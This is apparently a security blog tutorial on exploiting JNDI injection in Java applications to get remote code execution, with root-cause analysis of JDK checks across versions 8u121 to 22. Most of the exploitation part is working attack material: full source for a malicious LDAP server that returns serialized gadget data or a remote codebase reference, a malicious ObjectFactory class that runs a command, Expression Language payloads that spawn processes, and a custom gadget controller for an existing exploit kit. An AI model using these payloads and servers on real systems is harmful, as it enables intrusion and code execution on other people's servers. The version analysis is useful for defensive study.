JNDI Injection To Remote Code Execution.
In this blog post we will talk about
- What is JNDI Injection
- Vulnerable Code Signature
- Exploitation
- Before JAVA 8u121
- After Java 8u121
- Mitigation
- Root Cause Analysis
- Building your Own Malicious LDAP Server
- Modifying Existing Tools
- Beyond Java 8
- Effectivness of Exploit on JDK Versions
- Restrictions from JDK 20 To 22
What is JNDI Injection:
- import javax.naming.InitialContext;
- import javax.naming.Context;
- import javax.naming.NamingEnumeration;
- import javax.naming.NamingException;
- import javax.naming.directory.*;
Vulnerable Code Signature:
- Search for the entity
- Look Up
Exploitation:
For lookup():
For Search():
On JDK <=8u121:
On JDK >=8u121:
we will first exploit it on JDK 8u121
you can first compile the app with JDK 8u121 by downloading the jdk8u121 from Oracle site and putting it in the class path.
Now lets download the JNDI-Exploit-Kit
Lets Compile the JNDI Exploit Kit and start our malicious JNDI server
mvn clean package
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C "curl http://localhost:9001/ExploitWith8u121Success"
The above will generate some ldap and rmi urls, pick the right url and feed it to the app.
You will see that we got a http call back to our server as shown on the below image
we will now exploit it on JDK version higher than 8u121
Key point here is that we need to have to have a gadget on the class path to Get Full fledge RCE on JDK version higher than 8u121+ and 8u191+
So we will take 2 cases
- With 1 of the gadget Such as commonsCollections present on the class Path
- No gadget of ysoserial present but the app is deployed on tomcat
Lets change the Ldap URL as follows
Lets try the same above methods but this time we will compile the code by passing CommonsCollection3.2.1 on the class path
javac -cp commons-collections-3.2.1.jar:. jntest.java
java -cp commons-collections-3.2.1.jar:. jntest
you will see ,this time the operations on the ldap server is different.
instead of pointing to the remote class the ldap server has returned a serialised data which is for CommonsCollections6 gadget
and we have successfully exploited the vulnerablity
Using Tomcat WebServer
Now the way we exploit the vulnerablity in a tomcat server is by utilising a gadget present on the tomcat class Path
The gadget is tomcat version specific.THe last version i check where it was working was tomcat 8.5.75
To understand what this gadget is, lets take a look into the Malicous LDap Code(we will see how to build you own later in this blog post)
The gadget uses the org.apache.naming.factory.BeanFactory class along with javax.el.ELProcessor to send our malicous payload i.e
String payload = ("{" +
"\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" +
".newInstance().getEngineByName(\"JavaScript\")" +
".eval(\"java.lang.Runtime.getRuntime().exec(${command})\")" +
"}")
.replace("${command}", makeJavaScriptString(Config.command));
Now why does this particular class is used is out side the scope of this blog
Checkout Exploiting JNDI Injection In Java Veracode To learn about it.
So If the tomcat server uses the tomcat server with the below version then the above gadget can be used to get code execution
8.5.x for 8.5.79 onwards
9.0.x for 9.0.63 onwards
10.0.x for 10.0.21 onwards
10.1.x for 10.1.0-M14 onwards
So lets change our code to use the tomcat gadget
Mitigation:
For lookup():
For search():
Root Cause Analysis:
So to analyse the Root cause the best way is to use a debugger and an ide
So after debugging the entire flow with vulnerable exploitation we found the follwoing code flow.
For Remote Class Loading
org.struts2Test.jndiTestAction.execute
javax.naming.InitialContext.lookup(409)
com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:220)
com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1115)
com.sun.naming.internal.getDirObjectInstance(NamingManagerHelper.java:105)
com.sun.naming.internal.getObjectFactoryFromReference(NamingManagerHelper.java:206)
com.sun.naming.internal.VersionHelper.loadclass(VersionHelper.java:110)
For exploit using 3rd party gadgets
org.struts2Test.jndiTestAction.execute
javax.naming.InitialContext.lookup(409)
com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:220)
com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1081)
com.sun.jndi.ldap.Obj.decodeObject(Obj.java:240)
com.sun.jndi.ldap.Obj.deserializeObject(Obj.java:532)
com.sun.jndi.ldap.Obj.deserializeObject(Obj.java:532)
- Why above JDK 8u121 the Remote Class loading is not possible
- How does the third party gadget exploits are working and till which versions of JDK and why
So to answer the first question we have to anayluse the first flow.
The code flow changes from the LdapCtx.java as shown Above.
If you check the last sink fucntion you will see there is conditional check if we can TRUST_URL_CODE_BASE
tracing the variable back
As you can see the default value is set to false and if the value is set to false , the condition is failed and we can not trust the Code base and from the loadclass() returns null
Hence we can not exploit this vulnerability on JDK higher than 8u121 as till 8u121 the value of the com.sun.jndi.ldap.object.trustURLCodebase was true by default.
So if the target application is using JDK higher than 8u121 but explicitly setting this property to true then we can still load the remote class and achieve RCE Via this way.
Lets answer the 2nd question now
Now if you analyse the 2nd flow's 2nd last sink function() i.e decodeObject() Obj.java(227), you will see the function is calling deserializeObject() with a classLoader and some attributes.
These attributes are the attribute that we will be sending from our Ldap server and the get() just makes sure that only the value is being passed to the function
Now deserializeObject() eventually passes this byte array to ObjectInputStream or LoaderInputStream(which any way sends it back to ObjectInputStream using inheritance) and calls the readObject() on it.
As you are well aware this is a classic java Deserialisation attack scenario
Hence we are able to send serialised gadget chain of the 3rd party libraries and achieve RCE Via this.
Then why this is not working after JDK 19.
Play close attention to decodeObject() line 236
As you can see it checks if isSerialData is allowed
Examining the function at VersionHelper and backtracking as we did above for the Remote Class loading we see the below
So since the default value of com.sun.jndi.ldap.object.trustSerialData is set to false and based on this Value the check at decodeObject() either moves to deserializeObject() or throws an error, we are not able to exploit this on JDK above 19.
So if the application is explicitly setting this property value to be True then we can again exploit it even on JDK 22 which is the latest JDK Released at the time of writing.
Building your Own Malicious LDAP Server
Note:In real life exploitation you may not find any of the ysoserial gadget working.At that time you need to have a custom gadget and should be able to integrate that gadget with your own malicous server or existing tools.
So learning how to build your own Malicious server can help you with both the cases.
The Ldap server can be built for 2 purpose
- For remote class loading
- For sending serialized Data that uses Gadgets present in the class path to Acived RCE
For sending serialized Data that uses Gadgets present in the class path to Acived RCE
So lets breka the malicious ldap server into below steps
We will be using UnboundID LDAP SDK
- Configure the in-memory LDAP Serverr
- Add entries that returns serialized data for a particular search
- Start the ldap server
public class ldaptest {
//Setting up the configuration for the malicious LDAP Server
InMemoryDirectoryServerConfig serverConfiguration() throws LDAPException
{
InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("random=test");
InMemoryListenerConfig listenerConfig = InMemoryListenerConfig.createLDAPConfig("default", 1389);
config.setListenerConfigs(listenerConfig);
return config;
}
//Creating Malicous Entries TO send Serilised Data
InMemoryDirectoryServerConfig malicousServerEntryAndResponse(byte[] decodedBytes) throws LDAPException
{
InMemoryDirectoryServerConfig config=serverConfiguration();
//Itnercepting the Call and sending Malcious Response
config.addInMemoryOperationInterceptor(new InMemoryOperationInterceptor() {
@Override
public void processSearchResult(InMemoryInterceptedSearchResult result) {
ReadOnlySearchRequest request = result.getRequest();
if (request.getBaseDN().toString().equalsIgnoreCase("o=custom")) {
System.out.println("Inside Malicious EntryFucntion() on custome thing");
Entry entry = new Entry("o=custom");
entry.addAttribute("javaClassName", "java.lang.String");
entry.addAttribute("javaSerializedData", decodedBytes);
System.out.println("service Response");
try {
result.sendSearchEntry(entry);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (LDAPException e) {
e.printStackTrace();
}
} else {
result.setResult(new LDAPResult(0, ResultCode.NO_SUCH_OBJECT));
}
}
});
return config;
}
//Main Method
public static void main(String[] args) {
try {
//Ysoserial Payload
String ser_data="base64 encoded Serilised Gadget Data";
byte[] decodedBytes = Base64.getDecoder().decode(ser_data);
ldaptest obj=new ldaptest();
//Starts the LDAP Server
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(obj.malicousServerEntryAndResponse(decodedBytes));
ds.startListening();
System.out.println("LDAP Server started on port 1389");
} catch (Exception e) {
e.printStackTrace();
}
}
Adding all the above, a sample malicious LDAP Server code should look like below
import java.util.Base64;
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.*;
public class ldaptest {
//Setting up the configuration for the malicious LDAP Server
InMemoryDirectoryServerConfig serverConfiguration() throws LDAPException
{
InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("random=test");
InMemoryListenerConfig listenerConfig = InMemoryListenerConfig.createLDAPConfig("default", 1389);
config.setListenerConfigs(listenerConfig);
return config;
}
//Creating Malicous Entries TO send Serilised Data
InMemoryDirectoryServerConfig malicousServerEntryAndResponse(byte[] decodedBytes) throws LDAPException
{
InMemoryDirectoryServerConfig config=serverConfiguration();
//Itnercepting the Call and sending Malcious Response
config.addInMemoryOperationInterceptor(new InMemoryOperationInterceptor() {
@Override
public void processSearchResult(InMemoryInterceptedSearchResult result) {
ReadOnlySearchRequest request = result.getRequest();
if (request.getBaseDN().toString().equalsIgnoreCase("o=custom")) {
System.out.println("Inside Malicious EntryFucntion() on custome thing");
Entry entry = new Entry("o=custom");
entry.addAttribute("javaClassName", "java.lang.String");
entry.addAttribute("javaSerializedData", decodedBytes);
System.out.println("service Response");
try {
result.sendSearchEntry(entry);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (LDAPException e) {
e.printStackTrace();
}
} else {
result.setResult(new LDAPResult(0, ResultCode.NO_SUCH_OBJECT));
}
}
});
return config;
}
//Main Method
public static void main(String[] args) {
try {
//Ysoserial Payload
String ser_data="base64 encoded Serilised Gadget Data";
byte[] decodedBytes = Base64.getDecoder().decode(ser_data);
ldaptest obj=new ldaptest();
//Starts the LDAP Server
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(obj.malicousServerEntryAndResponse(decodedBytes));
ds.startListening();
System.out.println("LDAP Server started on port 1389");
} catch (Exception e) {
e.printStackTrace();
}
}
}
For Remote Class Loading:
For remote class loading we have to change the malicousServerEntryAndResponse() as below.
InMemoryDirectoryServerConfig malicousServerEntryAndResponse(byte[] decodedBytes) throws LDAPException
{
InMemoryDirectoryServerConfig config=serverConfiguration();
//Itnercepting the Call and sending Malcious Response
config.addInMemoryOperationInterceptor(new InMemoryOperationInterceptor() {
@Override
public void processSearchResult(InMemoryInterceptedSearchResult result) {
ReadOnlySearchRequest request = result.getRequest();
if (request.getBaseDN().toString().equalsIgnoreCase("o=custom")) {
System.out.println("Inside Malicious EntryFucntion() on custome thing");
Entry entry = new Entry("o=custom");
entry.addAttribute("objectClass", "javaNamingReference");
entry.addAttribute("javaClassName", "java.lang.String"); //could be any unknown
entry.addAttribute("javaFactory", "testObject"); //could be any unknown
entry.addAttribute("javaCodebase", "http://localhost:9004/");
//entry.addAttribute("javaSerializedData", decodedBytes);
System.out.println("service Response");
try {
result.sendSearchEntry(entry);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (LDAPException e) {
e.printStackTrace();
}
} else {
result.setResult(new LDAPResult(0, ResultCode.NO_SUCH_OBJECT));
}
}
});
return config;
}
we have added 4 new entires and removed the javaSerializedData attribute.
- objectClass="javaNamingReference"
- javaClassName="java.lang.String" //could be any unknown
- javaFactory="testObject" //could be any unknown
- javaCodebase= "http://localhost:9004/"
Now the Vulnerable application is going to fetch the http://localhost:9004/testObject.class
So you need to have testObject.class ready On your server
The testObject class should implement javax.naming.spi.ObjectFactory and should override the getObjectInstance()
The code you want to execute should be inside the default constructor.
In short the testObject.class code should look like below
import java.lang.*;
import javax.naming.Context;
import javax.naming.Name;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.util.Hashtable;
public class testObject implements javax.naming.spi.ObjectFactory
{
public testObject()
{
try{
Runtime.getRuntime().exec("touch /tmp/pwnedViaRemoteReference");
}catch(Exception e)
{
e.printStackTrace();
}
}
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) {
return null;
}
}
Modifying Existing Tools
Although it is not difficult to build your own malicious server , it is often easier to modify the exsting tools to fullfill your exploitation Requirements.
So lets analyse how to modify some existing tools such as Rogue JNDI server From Veracode
Lets take WebSphere1.java to understand how to build our own LDAP Mapper where we can add our own gadget
- A Custom Annotation @LdapMapping This attribute takes the url, which is like the input the vulnerable application is either going to lookup() or search() for.
- The Class implements LDAPController and the sendReuslt Function takes InMemoryInterceptedSearchResult as input This result is then used to send the response back to the user
- Inside the sendResult() we see 2 key things
e.addAttribute("javaClassName", "java.lang.String");
e.addAttribute("javaSerializedData", serialize(ref));
The rest are the gadget used(WebSphere1 gadget).
javaSerializedData is being used to send the serialize ref which === Sending the serialized gadget data.
So assuming we do not have any well known gadget in the class path and we have to custom make our gadget and want to integrate it with the above ldap server , we can follow below steps.
- Create a file called custom.java under the controller directory.
-
Copy paste the below code
package artsploit.controllers; import artsploit.annotations.LdapMapping; import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; import com.unboundid.ldap.sdk.Entry; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; import java.util.Base64; @LdapMapping(uri = { "/o=custom"}) public class custom implements LdapController { public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception { Entry e = new Entry(base); System.out.println(base); e.addAttribute("javaClassName", "java.lang.String"); //could be anything String ser_data="base64 encoded serialized Gadget Data"; byte[] decodedBytes = Base64.getDecoder().decode(ser_data); e.addAttribute("javaSerializedData",decodedBytes ); System.out.println("Data sent"); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } }
- Recomplie the Application
mvn clean package
Now you can see that our custom mapper is ready to exploit.
Bonus
Beyond Java 8:
So currently there are JDK versions till 21.
The above discussed Techniques differs from JDK versions to versions
Checkout the table below.
Exploit Technique | JDK Version Range | Impact |
---|---|---|
Remote Class Loading | JDK <8u121 | works |
Using Third party Gadgets | JDK <=19 | works |
Tomcat Gadget | JDK <=14 | works |
But what about JDK 14 to 19 , why tomcat gadget will not work there?
To answer the above question lets take a close into the gadget
The gagdet uses the javax.el.ELProcessor.eval() to execute an expression language written on the payload variable.
This expression language uses ScriptEngine which is not available after JDK 14 (nashorm script engine is absent).
And hence the expression language never succeeds to give us a shell
Chaning the expression language on the payload variable to below will give you code execution.
{''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['calc.exe']).start()}
The above code will pop a calculator.If you application is in a linux env you have change the binary accordingly.
Restrictions from JDK 20 To 22
on JDK above 19 i.e from JDK version 20 Onwards we can not even use the Thrid Party Gadgets(Such as gadgets available on ysoserial) because the Deserialisation from Java naming apis are blocked by default.
Let's take a look into the below code to understand why
If you try to exploit on JDK above 19 you will see the below stack trace
Lets examine the code from Obj.java
Backtracking the code we see the Code have a if else condition which checks for if serialData is allowed
Lets check the VersionHelper.java
As you can see above, the default value of the trustSerialData is set to false which is responsible for allowing the JDK to deserilize the data
So unless the target application is not explicitly setting the value of this system property to True , the exploitation is not possible.
So if the target app is using JDK version higher than 19, its a good idea to check if this property being explicitly set somewhere
Similary even if the application is using JDK version less than 19 you may not be able to exploit it if the application is explicitly setting this value to false.
Thats it For this Blog.
Thanks For Reading.
Happy Hacking.
You can connect with me at: